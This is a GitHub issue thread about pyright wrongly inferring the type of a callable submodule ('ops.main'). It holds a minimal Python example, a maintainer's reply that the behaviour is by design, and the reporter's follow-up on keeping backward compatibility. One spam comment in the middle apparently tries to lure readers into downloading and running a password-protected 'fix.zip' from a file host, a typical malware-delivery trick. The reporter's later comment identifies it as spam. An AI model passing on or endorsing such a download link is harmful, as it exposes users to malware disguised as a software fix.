### ISSUE TITLE
Type of a callable submodule is inferred incorrectly

### ISSUE THREAD

**Issue by dimaqq** [microsoft/pyright#8830]
Given following `ops/__init__.py`:

```py
from types import ModuleType

from . import main as _main

class _CallableMainModule(ModuleType):
    def __call__(self):
        return 42

main = _CallableMainModule("ops.main", "some doc")

__all__ = ["main"]
```

And this the test code below, pyright doesn't agree with Python run time:

```py
  def test_top_level_import():
      import ops

      reveal_type(ops.main) # "_CallableMainModule"
      assert ops.main() == 42


  def test_submodule_import():
      import ops.main

      reveal_type(ops.main) # "Module("ops.main")"
E     assert ops.main() == 42 # E: Module is not callable


  def test_function_import():
      from ops import main

      reveal_type(main) # "_CallableMainModule"
      assert main() == 42
```

In fact, all 3 imports+call styles work OK at run time.

Full MRE: https://github.com/dimaqq/MRE-pyright-submodule-import
Tested: `pyright 1.1.377`

Note that if `from . import main as _main` is removed, pyright's interpretation of submodule import becomes correct, but then pyright doesn't catch the function import.

**Comment by erictraut** [comment]
Your code is relying on side effects of the import loader that pyright [does not model](https://microsoft.github.io/pyright/#/import-statements). This is by design, so I don't consider this a bug.

You'll need to change your code if you want it to work with pyright.

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dimaqq** [comment]
Thank you for quick response.

Maybe I can get some advice how to best achieve what I'm really trying to do:

In the past we have `ops/main.py: def main(..): ...`:
- some users did `from ops.main import main; main(...)`
- others did `import ops.main; ops.main.main(...)`

We can't afford a breaking change, but we want:
- our users to do `import ops; ops.main(...)`
- have correct type hints for the public API

In our case, the new way of calling main was introduced before the package got typed.

P.S. there seem to some kind of spam going around on GitHub, this issue got a comment from spammer, right above. We're reporting and deleting these comments in our repos, but it seems that only maintainers can do so.
